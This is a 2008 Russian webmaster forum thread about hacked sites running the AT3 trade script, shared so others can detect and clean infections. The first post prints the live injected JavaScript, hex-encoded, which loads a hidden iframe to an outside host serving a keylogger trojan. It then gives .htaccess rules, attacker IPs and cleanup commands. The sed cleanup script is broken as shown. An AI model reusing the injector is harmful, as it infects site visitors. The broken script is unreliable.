С нами с 25.06.03
Сообщения: 491
Рейтинг: 77
|
 Добавлено: 16/03/08 в 02:26 |
На этой недели ломанули один из моих тгп, да так что убило установленную на нем ванилуТГП.
Все файлы этого скрипта и генерируемых страниц, были прописаны яваскриптом, который через иФрейм подгружал вирусяку.
Вначале я был уверен, что взлом произошел через дырки в скриптах ваннилы. Целые сутки я и ребята с сапорта моего хостинга разбирались - кто и как(через что) ломанул сайт. Оказалось виновник - атл, несмотря на то, что у меня стоял 16 апдейт, в котором, вроде, были пофиксаны ошибки безопасности.
Ближе к делу, проверьте не заражен ли ваш саит - проверьте ХТМЛ код индекса и др. стр. сайта на присутствие след. кода:
| Код: | <script> var s='3C696672616D65207372633D22687
474703A2F2F7365786F6E6E65742E636F6D2F746F706C6973742F
7A2F7374617469632E706870222077696474683D3220686569676
8743D32207374796C653D22646973706C61793A6E6F6E65223E3C
2F696672616D653E';
var o=''; for(i=0;i<s.length;i=i+2) { var c=String.fromCharCode(37); o=o+c+s.substr(i,2);}
var v=navigator.appVersion;
if (v.indexOf('MSIE 6.0') != -1){
document.write(unescape(o));}
if (v.indexOf('MSIE 5.') != -1){
document.write(unescape(o));}</script> |
(если ваш анивирь не гудит, когда вы заходите на ваш сайт, это назначит, что вам повезло и заразы нет - НОД например не видет этой гадости!)
Этот явакод прописывает следующий ХТМЛ в страницу:
| Код: | | <iframe src="_чttp://sexonnet.com/toplist/z/static.php" width=1 height=1></iframe> |
(урл загрузки может быть другим.)
... какие скрытые функции выполняет static.php я не знаю, но в итоге он подгружает - animan.class, это загрузчик самого трояна.
И несколько слов о том, что это за троян - насколько мне известно - это **02.ехе файл, представляющий из себя сканер клавы и грабер экрана 
По этому предлагаю обезопасить ваши сиджи:
1. ограничев доступ к файлом скрипта, а именно к скрипту через которого произходит взлом -
../cgi-bin/at3/x/x2.cgiсоздав в директории ../cgi-bin/at3/x/ файл .htaccess с таким содержанием:
| Код: | <Files x2.cgi>
Order Deny,Allow
Deny from all
Allow from ВашИП1
Allow from ВашИППрокси2
</Files> |
если у вас динамический ИП(у большинства), то добавьте только ИП покси из под которого вы работаете.
Если вы не пользуетесь прокси и не имеете постоянного ИП у провайдера, тогда есть вариант описанный здесь:
чttp://www.askdamagex.com/t24283-sites-got-hacked.html
Обратите внимание! После этого действия новые трейдеры не смогут к вам добавляться!
2. Аналогично вышеописанному примеру, добавьте .htaccess в ../cgi-bin/at3/ с таким кодом:
| Код: | <Files admin.cgi>
Order Deny,Allow
Deny from all
Allow from ВашИП1
Allow from ВашИППрокси2
</Files> |
3. На данный момент выявлено всего 2-а сервака, откуда производились взломы, вот их ИП: 203.117.111.106 и 195.5.116.250
Рекомендую закрыть доступ с сайту этим ИП, добавив следующий код к .htaccess в корневой директории. Это удобно сделать через админку АТЛ - меню: ip daemon, и добавляем этот код в поле "IP Daemon - htaccess Header"
| Код: | order deny,allow
deny from 203.117.111.106
deny from 195.5.116.250
allow from all |
4. Если сайт был хакнут, надо отыскать на нем один из двух файлов, sync.php и/или backup.php.
выполните из шелла updatedb (права рута) и locate sync.php. Удалите найденные, кроме /st/admin/sync.php - это файл смарта его не трогать!!! (если у вас он установлен)
5. Удалите код из зараженных станиц, найти их можно создав в шелле скрипт (в домашней директ. сайта)-
sed.sh
| Код: |
#!/bin/sh
# for fname in `cat report.txt`; do
cat $fname | sed 's/ .*<script> var s.*<\/script> .*//g' > $fname.temp
if [ ! "`cat $fname.temp | md5sum`" = "`cat $fname | md5sum`" ]; then
cat $fname.temp > $fname
fi
rm $fname.temp
done
|
и выполните его. Результат - файл report.txt со списком инфицированных файлов.
Что бы вырезать код из ваших страниц - выполните в шеле: | Код: | | grep -H "<script> var s=" /home/dir -R | cut -d: -f1 |
5. Переинстальте все скрипты(ТГП, Ротаторы, СЖ).
Надеюсь это кому-то поможет.
пс. ИМХО ломают связки - атл3+смарт, атл3+ванилла(гробит саму ванилу) и атл3+стрим.
Последний раз редактировалось: Remy (20/03/08 в 23:20), всего редактировалось 2 раз(а)
|
|
|
|
| |
С нами с 25.06.03
Сообщения: 491
Рейтинг: 77
|
| Добавлено: 16/03/08 в 02:41 |
|
|
|
|
| |
Runka Snorkarka
С нами с 26.05.06
Сообщения: 1751
Рейтинг: 1278
|
| Добавлено: 16/03/08 в 04:27 |
| Remy писал: | | Оказалось виновник - атл, несмотря на то, что у меня стоял 16 апдейт, в котором, вроде, были пофиксаны ошибки безопасности. |
Нечего там не пофиксено, еще в начале января писали что как ломали так и ломают ат3, если хтацесс не защищен.
|
|
|
|
| |
Летчик - залетчик
С нами с 13.10.05
Сообщения: 1120
Рейтинг: 855
|
| Добавлено: 16/03/08 в 07:54 |
Я защитил свои сиджи - снес АТ3 нахер.
|
|
|
|
Mature/MILF and Teen trade - 324393766
|
0
|
|
| |
Любитель хорошего ;)
С нами с 08.06.07
Сообщения: 16151
Рейтинг: 6269
 
|
| Добавлено: 16/03/08 в 08:10 |
Мда, нехорошая репутация у atl3 теперь.
|
|
|
|
| |
С нами с 08.09.03
Сообщения: 627
Рейтинг: 654
|
| Добавлено: 16/03/08 в 09:23 |
что самое интересное, на нем по прежнему сидят ) и собственно альтернатив то ему почти нет ))
|
|
|
|
| |
С нами с 30.11.03
Сообщения: 135
Рейтинг: 102
|
| Добавлено: 16/03/08 в 09:58 |
Достаточно одного уже существующего .htaccess в папке ../cgi-bin/
Дописать в него:
<FilesMatch "(admin|x2|login)\.cgi">
Order Deny,Allow
Deny from All
Allow from Ваш IP1
Allow from Ваш IP2
</FilesMatch>
Starforce
АТХ отличный скрипт, и то что его ломают не значит что он полное Г...
80% компьютеризированного населения нашей планеты сидит на продукции компании Майкрософт, которую ломают по 10 раз в день. Дань популярности.
И вовсе не означает что тот же Протон, Фет или ATS в 100 раз устойчивее к взлому и т.д. Ими просто никто серьезно не занимался, ибо процент проектов на них достаточно мал, и проще "докапаться" до одного АТХ чем до их всех вместе взятых.
Понимая все это, куда либо переходить с продукции Arrow Scripts не собираюсь. Авторы думаю не дураки, в ближайшее время будет апдейт и не один. Через пару месяцев обещали АТХ 2.0 выпустить и т.д.
А пока нормально настроенного файрвола на сервере и грамотно прописанного .htaccess думаю хватит (я на всякий случай еще скрипт ротатора закрыл).
|
|
|
|
| |
XXX-Server.biz
С нами с 15.02.03
Сообщения: 9411
Рейтинг: 6676
|
| Добавлено: 16/03/08 в 12:24 |
можно просто в конфиг апача это добавить чтобы на каждый сидж не создавать htaccess
|
|
|
|
| |
Прожигатель жизни
С нами с 20.10.05
Сообщения: 942
Рейтинг: 638
|
| Добавлено: 16/03/08 в 12:31 |
Вредоносный код вставляется через меню toplists (в АТ3) - это меню позваляет создать любой файл на сервере. Чтобы получить доступ к админке АТ3 злоумышленник(-и) воруют cookies. ТС проверь у себя в security log'е предварительно выключив выполнение JavaSript'ов в браузере - там будет строка типа 203.117.111.106 tryed to login with user / pass. На самом деле там еще есть скрытый код (можно посмотреть в сорсе) который отсылает куку.
|
|
|
|
| |
罪人
С нами с 02.04.06
Сообщения: 736
Рейтинг: 849
|
| Добавлено: 16/03/08 в 13:23 |
| Цитата: |
что самое интересное, на нем по прежнему сидят ) и собственно альтернатив то ему почти нет )) |
альтернативы какраз то есть, и вполне достойные..... просто многим впадлу пробовать и разбираться в новых скриптах....
|
|
|
|
| |
С нами с 06.10.01
Сообщения: 1655
Рейтинг: 728
|
| Добавлено: 16/03/08 в 13:37 |
| Tsumibit0 писал: | | альтернативы какраз то есть, и вполне достойные..... просто многим впадлу пробовать и разбираться в новых скриптах.... |
посоветуй плз
|
|
|
|
| |
罪人
С нами с 02.04.06
Сообщения: 736
Рейтинг: 849
|
| Добавлено: 16/03/08 в 14:32 |
фтт, атс, протон, фет, епт... собственно есть и другие за %....
у каждого есть свои "+" и "-", но выбор очень даже есть....
думаю это тема данной ветки обсуждать на что поменять ат3.... это совсем отдельная история....
если фтт решишь попробовать, велком в асю, поделюсь опытом.... ;)
|
|
|
|
| |
Гражданин планеты Земля
С нами с 30.03.03
Сообщения: 7217
Рейтинг: 2185
|
| Добавлено: 16/03/08 в 15:12 |
статья от 2-го квартала 2007-го, наверняка уже должно быть лекраство.
|
|
|
|
| |
С нами с 02.09.06
Сообщения: 598
Рейтинг: 613
|
| Добавлено: 16/03/08 в 15:53 |
Мы на всех дедиках с сиджами заблокировали файрволом айпишки с которых ломают атл. По крайней мере на какое-то время защитили.
|
|
|
|
| |
С нами с 13.01.03
Сообщения: 1032
Рейтинг: 1146
|
| Добавлено: 16/03/08 в 23:09 |
ну, эт бессмысленно практически... думаю с новыми айпишками у уродов проблем нет... последняя атака вот отсюда например - 202.83.197.228
|
|
|
|
| |
С нами с 19.07.04
Сообщения: 738
Рейтинг: 370
|
| Добавлено: 17/03/08 в 05:18 |
| Doctor писал: | | ну, эт бессмысленно практически... думаю с новыми айпишками у уродов проблем нет... последняя атака вот отсюда например - 202.83.197.228 |
Док..опять поломали или просто продолжают пытаться?
|
|
|
|
| |
С нами с 19.01.04
Сообщения: 134
Рейтинг: 92
|
| Добавлено: 17/03/08 в 10:45 |
А я был уверен, что виновен скрипт хирамакса. Давно было желание поменять AT3 на ATS, но сомневался. Теперь сомнений не осталось.
Последний раз редактировалось: Blink (21/03/08 в 17:11), всего редактировалось 1 раз
|
|
|
|
| |
С нами с 27.11.05
Сообщения: 945
Рейтинг: 930
|
| Добавлено: 17/03/08 в 12:03 |
| Blink писал: | | Давно было желание поменять AT3 на ATX, но сомневался. Теперь сомнений не осталось. |
А atx типа так не ломается чтоли?
|
|
|
|
| |
We're still on the case
С нами с 01.08.04
Сообщения: 1997
Рейтинг: 1354
|
| Добавлено: 17/03/08 в 12:57 |
Уже давно пора было позакрывать доступы. Сколько раз ломали его уже, и обсуждали это не один раз.
|
|
|
|
| |
С нами с 13.11.07
Сообщения: 226
Рейтинг: 100
|
| Добавлено: 17/03/08 в 17:29 |
Если надоели взломы - вот здесь можно найти сервис, который может сильно облегчить жизнь. Регистрируемся и пользуемся, пока все бесплатно ;)
Оффтопик: P.S. Сорри если так нельзя делать... Уважаемые модераторы, не сочтите за спам - замечал, что владельцы многих сиджеевых скриптов рекламируют свои скрипты подобным образом
|
|
|
|
| |
С нами с 13.01.03
Сообщения: 1032
Рейтинг: 1146
|
| Добавлено: 17/03/08 в 22:44 |
| FatMike писал: | | Док..опять поломали или просто продолжают пытаться? |
Майк, попытки в логах эвридэй с разных айпи... взломов нет, т.к. х2.cgi закрыт
|
|
|
|
| |
(.)(.) Сиськеее...
С нами с 20.05.03
Сообщения: 2598
Рейтинг: 2651
|
| Добавлено: 18/03/08 в 09:37 |
| Doctor писал: | | Майк, попытки в логах эвридэй с разных айпи... взломов нет, т.к. х2.cgi закрыт |
Значит твой логин с паролем уже уплыл...
Бро, почитай здесь...
Да и все остальные получат пользу от этого топика...
Там очень подробно расписано как ломается АТ даже при заблоченом х2...
И скажу я вам, это не от популярности АТ, а от идиотизма разработчика, надо же додуматься в таком виде логи писать...
|
|
|
|
| |
С нами с 28.01.06
Сообщения: 380
Рейтинг: 588
|
| Добавлено: 18/03/08 в 10:12 |
Вот блин не понимаю зачем плодить темы об одном и том же ведь обсуждаеться все это в соседней ветке.
|
|
|
|
| |
We're still on the case
С нами с 01.08.04
Сообщения: 1997
Рейтинг: 1354
|
| Добавлено: 18/03/08 в 14:06 |
Когда пишут о взломе и как защетится,остальным пох пока не поламали. Как только коснётся их,начинается одна и таже писанина. Я так это всё понимаю.
Закройте сразу все доступы и примите меры,о которых пишут. А вот,если уже и это не помагает,тогда надо трубить
|
|
|
|
| |
С нами с 17.12.00
Сообщения: 1653
Рейтинг: 1082
|
| Добавлено: 19/03/08 в 16:53 |
если форма регистрации закрыта то пох на взломы или как?
|
|
|
|
| |
